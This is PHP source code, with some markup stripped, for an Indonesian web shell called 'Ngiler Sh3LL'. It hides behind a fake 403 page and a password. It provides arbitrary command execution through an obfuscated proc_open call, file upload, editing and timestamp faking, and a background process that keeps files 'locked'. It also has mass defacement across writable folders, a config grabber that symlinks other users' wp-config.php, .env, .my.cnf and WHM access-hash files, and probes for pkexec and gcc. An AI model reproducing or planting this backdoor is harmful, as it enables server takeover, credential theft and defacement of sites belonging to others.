'; echo ""; echo "

Login berhasil..!!

"; echo ""; exit; } else { $error = "Password salah jancok!!"; } } if (isset($_GET['keluar'])) { session_destroy(); echo ''; echo ""; echo "

Logout berhasil..!!

"; echo ""; exit; } if (!isset($_SESSION['logged_in'])): http_response_code(403); echo " 403 Forbidden

403 Forbidden

Anda tidak memiliki izin untuk mengakses halaman ini.

"; if (isset($_GET['xor'])) { echo ' '; } exit; endif; $d7net = ['696e666f', # i nfo - 0 '61706c7574', # u plut - 1 '656b7365', # co man - 2 '6c6f6b70696c65', # lok pile - 3 '67616e74697077', # bek konek - 4 '636e666967', # c nfig - 5 '6366696c65', # c pi le - 6 '63646972', # c dir - 7 '746f6f6c73', # T oo ls - 8 '6d6173736465706573', # msd epes - 9 '7a6970657874' # zi pext - 10 ]; function renameItem($oldName, $newName) { if (rename($oldName, $newName)) { echo "File/Folder berhasil diubah!"; } else { echo "Terjadi kesalahan saat mengubah nama!"; } } function deleteItem($item) { if (is_file($item)) { if (unlink($item)) { successMessage("File berhasil dihapus!", dirname($item)); } else { echo "Terjadi kesalahan saat menghapus file!"; } } elseif (is_dir($item)) { if (cekfol($item)) { successMessage("Folder berhasil dihapus!", dirname($item)); } else { echo "Terjadi kesalahan saat menghapus folder!"; } } } function cekfol($folder) { foreach (scandir($folder) as $file) { if ($file === '.' || $file === '..') continue; $fullPath = $folder . '/' . $file; if (is_dir($fullPath)) { cekfol($fullPath); } else { unlink($fullPath); } } return rmdir($folder); } function successMessage($message, $redirectDir) { echo ''; echo ""; echo "

$message

"; echo ""; exit; } if (isset($_POST['action'])) { $action = $_POST['action']; $path = $_POST['path']; if ($action == 'rename') { $newName = $_POST['new_name']; renameItem($path, $newName); } elseif ($action == 'delete') { deleteItem($path); } if ($action == 'save_date') { $edate = $_POST['path']; if(isset($_POST['sikat'])) { if(@touch($edate, strtotime($_POST['chdate'])) == true) { echo successMessage("Berhsil mengubah Tanggal!", dirname($edate)); exit; } else { echo "
Gagal mengubah tanggal!
"; } } } if ($action == 'save_edit') { $editPath = $_POST['path']; $newContent = $_POST['content']; if (is_file($editPath)) { file_put_contents($editPath, $newContent); echo successMessage("File Berhasil Disimpan!", dirname($editPath)); exit; } else { echo "
Gagal menyimpan file!
"; } } if ($action == 'rename_item') { $old = $_POST['old_path']; $new = dirname($old) . '/' . $_POST['new_name']; if (rename($old, $new)) { echo ''; } else { echo ''; } } } function pkesek(): bool { $paths = explode(PATH_SEPARATOR, getenv('PATH')); foreach ($paths as $path) { $fullPath = $path . DIRECTORY_SEPARATOR . 'pkexec'; if (file_exists($fullPath) && is_executable($fullPath)) { return true; } } return false; } function gcc() { $paths = [ '/usr/bin/gcc', '/bin/gcc', '/usr/local/bin/gcc' ]; foreach ($paths as $path) { if (is_executable($path)) { return $path; } } return false; } function allheks($str) { $hex = ''; for ($i = 0; $i < strlen($str); $i++) { $hex .= dechex(ord($str[$i])); } return $hex; } function cdheks($hex) { $str = ''; for ($i = 0; $i < strlen($hex) - 1; $i += 2) { $str .= chr(hexdec($hex[$i] . $hex[$i + 1])); } return $str; } function d7net_ex($file) { $pile = $file; $pch = pathinfo($pile, PATHINFO_FILENAME); return $pch; } function ekse($crot, $currentDir = false) { if (empty(trim($crot))) { echo ""; return; } $run = "2>&1"; if (!preg_match("/".$run."/i", $crot)) { $crot = $crot." ".$run; } $crt = $crot; $pr = "p"."ro"."c_o"."p"."en"; if (function_exists($pr)) { $cek = @$pr($crt, array( 0 => array("pipe", "w"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ), $ktn, $currentDir); if (is_resource($cek)) { fclose($ktn[0]); echo "
"; fclose($ktn[1]); fclose($ktn[2]); proc_close($cek); } } else { echo "
Disable => ".$pr."()
"; } } function cemde($gas, $currentDir) { $crot = $gas; $pr = "proc_open"; if (function_exists($pr)) { $tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $currentDir); echo "".stream_get_contents($crottz[1])."
"; } else { echo ""; } } $currentDir = isset($_GET['opet']) ? cdheks($_GET['opet']) : getcwd(); $currentDir = str_replace("\\", "/", $currentDir); $folders = []; $files = []; $items = scandir($currentDir); foreach ($items as $item) { if ($item != '.' && $item != '..') { $fullPath = $currentDir . '/' . $item; if (is_dir($fullPath)) { $folders[] = $item; } else { $files[] = $item; } } } $allItems = array_merge($folders, $files); $paths = explode("/", $currentDir); function fsize($size) { if ($size >= 1073741824) { $size = ''.number_format($size / 1073741824, 2) . ' GB'; } elseif ($size >= 1048576) { $size = ''.number_format($size / 1048576, 2) . ' MB'; } elseif ($size >= 1024) { $size = ''.number_format($size / 1024, 2) . ' KB'; } elseif($size>1){ $size= ''.$size.' B'; } elseif($size==1){ $size= ''.$size.' B'; } else { $size = '0 B'; } return $size; } function owner($file) { if (function_exists("posix_getpwuid")) { $tod = @posix_getpwuid(fileowner($file)); return "
".$tod['name']."
"; } else { return "
".fileowner($file)."
"; } } if (isset($_GET['chdet'])) { $chedit = $_GET['chdet']; $chtime = basename($chedit); $tgl = date('d F Y g:i:s', filemtime($chedit)); echo ' Ganti Tanggal

Editing time : '.$chtime.'

'; exit; } if (isset($_GET['edit'])) { $fileToEdit = $_GET['edit']; if (is_file($fileToEdit)) { $fileContent = htmlspecialchars(file_get_contents($fileToEdit)); $fileName = basename($fileToEdit); ?> Edit File - <?php echo $fileName; ?>

Editing:

Cancel

Rename Item - <?php echo $currentName; ?>

Rename:

Cancel
[$drive:]"; } } } ?> #$$#!$#%$&

Ngiler Sh3LL

' class='btn btn-outline-light'>Home Information Upload Command Tools Logout
File Folder Create
"; echo ''; $encodedPath = ""; foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { echo "/"; continue; } if($pat == '') continue; $encodedPath .= ($id > 0 ? "/" : "") . $pat; $hexPath = allheks($encodedPath); echo "" . htmlspecialchars($pat) . "/"; } ?>

Command

'; if(isset($_POST['exe'])) { ekse($_POST['crot'], $currentDir); } exit; } elseif ($_GET['d7net'] == allheks('aplut')) { echo '

Upload File


'; if (isset($_FILES['fileUpload'])) { $targetDir = $currentDir . '/'; $targetFile = $targetDir . basename($_FILES['fileUpload']['name']); $uploadOk = 1; if (file_exists($targetFile)) { echo "
File sudah ada!
"; $uploadOk = 0; } if ($_FILES['fileUpload']['size'] > 5000000) { echo "
File terlalu besar!
"; $uploadOk = 0; } if ($uploadOk == 1) { if (move_uploaded_file($_FILES['fileUpload']['tmp_name'], $targetFile)) { echo "
File berhasil di-upload!
"; echo ""; } else { echo "
Terjadi kesalahan saat meng-upload file!
"; } } } exit; } elseif ($_GET['d7net'] == allheks('tools')) { echo '
'; exit; } elseif ($_GET['d7net'] == allheks('lokpile')) { echo '

Lock File

'; if (isset($_POST['submit'])) { if (empty($_POST['pile'])) { echo "
The File field is required
"; } else { $filez = $_POST['pile']; $tempe = "/tmp"; if (file_exists($tempe.'/sess_'.md5($currentDir. $filez.'-xd7net').d7net_ex($filez).'h4nd') && file_exists($tempe . '/'.d7net_ex($filez).'-xopet')) { cemde('rm -rf '.$tempe.'/sess_'.md5($currentDir. $filez.'-xopet').d7net_ex($filez).'0p3t', $currentDir); cemde('rm -rf '.$tempe.'/sess_'.md5($currentDir. $filez.'-xd7net').d7net_ex($filez).'h4nd', $currentDir); } cemde("cp $filez ".$tempe."/sess_".md5($currentDir. $filez.'-xopet').d7net_ex($filez).'0p3t', $currentDir); @chmod($filez, 0444); $content = 'Locked => $filez"; cemde('php '. $tempe . '/sess_' .md5($currentDir. $filez.'-xd7net').d7net_ex($filez).'"h4nd" > /dev/null 2>/dev/null &', $currentDir); } else { echo "
Can't lock $filez
"; } } } exit; } elseif ($_GET['d7net'] == allheks('zipext')) { if ($_SERVER['REQUEST_METHOD'] === 'POST') { usleep(1500000); $extractTo = rtrim($_POST['extract_path'], '/'); $zipPath = ''; if (!empty($_FILES['zip_file']['tmp_name'])) { $zipPath = $_FILES['zip_file']['tmp_name']; } elseif (!empty($_POST['zip_path'])) { $zipPath = $_POST['zip_path']; if (!file_exists($zipPath)) { die("
❌ File ZIP tidak ditemukan.

"); } } else { die("
❌ Harap upload atau isi path ZIP.

"); } if (!is_dir($extractTo)) { if (!mkdir($extractTo, 0755, true)) { die("
❌ Gagal membuat folder tujuan.

"); } } $zip = new ZipArchive; if ($zip->open($zipPath) === TRUE) { $zip->extractTo($extractTo); $zip->close(); echo "
✅ ZIP berhasil diekstrak => ".basename($extractTo)."

"; } else { echo "
❌ Gagal membuka file ZIP.

"; } } echo '
Sedang Proses => 1%

Zip Extractor







'; exit; } elseif ($_GET['d7net'] == allheks('gantipw')) { function chpwd($ceks) { $newpw = sha1($ceks); $newpw = "\$pew = \"$newpw\";"; $kon = file_get_contents($_SERVER['SCRIPT_FILENAME']); $kon = preg_replace("/\\\$pew *= *[\"']*([a-f0-9]{40})[\"']*;/s", $newpw, $kon); return file_put_contents($_SERVER['SCRIPT_FILENAME'], $kon); } echo '

Ganti Password Bekdur

'; if (isset($_POST['cpw'])) { $oldpass = sha1($_POST['oldpass']); if ($oldpass === $pew) { if ($_POST['pass1'] === $_POST['pass2']) { if (chpwd($_POST['pass1'])) { echo '
Ganti Password Berhasil..!!
'; } else { echo '
Ganti Password Gagal..!!
'; } } else { echo '
Password Baru tidak cocok..!!
'; } } else { echo '
Password lama salah..!!
'; } }exit; } elseif ($_GET['d7net'] == allheks('massdepes')) { function cekspol($dir) { $folders = []; $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { $folders[] = $path; $folders = array_merge($folders, cekspol($path)); } } return $folders; } function massDepes($pat, $pilez, $konten) { $allFolders = cekspol($pat); array_unshift($allFolders, $pat); $output = ""; foreach ($allFolders as $folder) { $fname = basename($folder); if (!is_dir($folder) || !is_writable($folder)) { $output .= "Gagal akses folder => " . $fname . "/
"; continue; } $targetPath = $folder . DIRECTORY_SEPARATOR . $pilez; if (file_exists($targetPath)) { $output .= "File Sudah ada => http://" . $fname . "/" . $pilez."
"; } else { if (file_put_contents($targetPath, $konten) !== false) { $output .= "http://" . $fname . "/" . $pilez."
"; } else { $output .= "Gagal => http://" . $fname . "/" . $pilez."
"; } } } return $output; } if (isset($_POST['massc'])) { $pilez = $_POST['pile']; $pat = $_POST['pat']; $kon = $_POST['kont']; echo "
"; echo massDepes($pat, $pilez, $kon); echo "
"; } else { echo '

Mass Deface







'; }exit; } elseif ($_GET['d7net'] == allheks('cnfig')) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['conf'])) { $v = "var"; $folfig = $_POST['folfig']; $type = $_POST['type'] ?? '.txt'; @mkdir($folfig, 0755, true); @chdir($folfig); $htaccess = " Options Indexes FollowSymLinks \nDirectoryIndex .my.cnf \nAddType txt .php \nAddType txt .my.cnf \nAddType txt .accesshash \nAddHandler txt .php \nAddHandler txt .cnf \nAddHandler txt .accesshash"; file_put_contents(".htaccess", $htaccess, FILE_APPEND); $passwd = explode("\n", $_POST["passwd"]); foreach ($passwd as $pwd) { $user = trim($pwd); if ($user === '') continue; $paths = [ "/home/$user/public_html/vb/includes/config.php" => "$user-vBulletin1$type", "/home/$user/public_html/forum/includes/config.php" => "$user-vBulletin3$type", "/home/$user/public_html/cc/includes/config.php" => "$user-vBulletin4$type", "/home/$user/public_html/config.php" => "$user-Phpbb1$type", "/home/$user/public_html/admin/config.php" => "$user-Phpbb2$type", "/home/$user/public_html/koneksi.php" => "$user-Phpbb3$type", "/home/$user/public_html/wp-config.php" => "$user-Wp1$type", "/home/$user/public_html/blog/wp-config.php" => "$user-Wp2$type", "/home/$user/public_html/web/wp-config.php" => "$user-Wp3$type", "/home1/$user/public_html/wp-config.php" => "$user-WpHm1$type", "/var/www/html/wp-config.php" => "$v-wp1$type", "/home/$user/public_html/.env" => "$user-Laravel1$type", "/home/$user/public_html/web/.env" => "$user-Laravel2$type", "/home/$user/public_html/public/.env" => "$user-Laravel3$type", "/var/www/html/.env" => "$v-LaravelV$type", "/home/$user/public_html/configuration.php" => "$user-Joomla1$type", "/home/$user/public_html/html/configuration.php" => "$user-Joomla2$type", "/home/$user/public_html/application/config/database.php" => "$user-CodeIgniter$type", "/home/$user/.my.cnf" => "$user-cpanel$type", "/home/$user/.accesshash" => "$user-whm$type" ]; foreach ($paths as $target => $linkName) { @symlink($target, $linkName); } } echo '
Status : Done ✅

'; } else { $users = file("/etc/passwd"); echo '

Config Grabber (Audit)





'; } exit; } elseif ($_REQUEST['d7net'] == allheks('cfile')) { if (isset($_POST['createf'])) { $nama_file = basename(trim($_POST["pile"])); $isi_file = $_POST["kont"]; $file = fopen("$currentDir/$nama_file", "w"); if ($file) { fwrite($file, $isi_file); fclose($file); echo "
File $nama_file berhasil dibuat.
"; echo ""; } else { echo "
Gagal membuat file.
"; echo ""; } } echo '




'; exit; } elseif ($_GET['d7net'] == allheks('cdir')) { if (isset($_POST['create_folder'])) { $peth = $currentDir .'/'. $_POST['folname']; if (!file_exists($peth)) { if (mkdir($peth, 0755, true)) { echo "
✅ Folder berhasil dibuat => $peth
"; echo ""; } else { echo "
Gagal membuat folder => ".basename($peth)."
"; } } else { echo "
⚠️ Folder sudah ada => ".basename($peth)."
"; } } echo '

';exit; } elseif ($_GET['d7net'] == allheks('info')) { echo "
System : ".php_uname()."
IP Address : ".$_SERVER['SERVER_ADDR']."
PHP Version : ".phpversion()."
Server : ".$_SERVER['SERVER_SOFTWARE']."
"; echo "MYSQL : "; if (function_exists("mysql_connect")) { echo "ON"; } else { echo "OFF"; } echo "  | cURL : "; if (function_exists("curl_init")) { echo "ON"; } else { echo "OFF"; } echo "  | WGET : "; if (file_exists("/usr/bin/wget")) { echo "ON"; } else { echo "OFF"; }echo "  | Perl : "; if (file_exists("/usr/bin/perl")) { echo "ON"; } else { echo "OFF"; } echo "  | Python : "; if (file_exists("/usr/bin/python2")) { echo "ON"; } else { echo "OFF"; } echo "  | GCC : "; $gecece = gcc(); if ($gecece) { echo "ON"; } else { echo "OFF"; } echo "  | PKEXEC : "; if (pkesek()) { echo "ON"; } else { echo "OFF"; } exit; } function stats($file){ $izin = substr(sprintf('%o', fileperms($file)), -4); return $izin; } if (!is_readable($currentDir)) { die('
Permission : Denied
Gagal akses folder => '.basename($currentDir).'
'); } ?>
Name
Size
Date Modified
Owner
Permissions
Actions
" . htmlspecialchars($item) . ""; } else { echo " " . htmlspecialchars($item); } ?>
'; elseif(!is_readable("$fullPath")) echo ''; echo stats("$fullPath"); if(is_writable("$fullPath") || !is_readable("$fullPath")) echo ''; ?>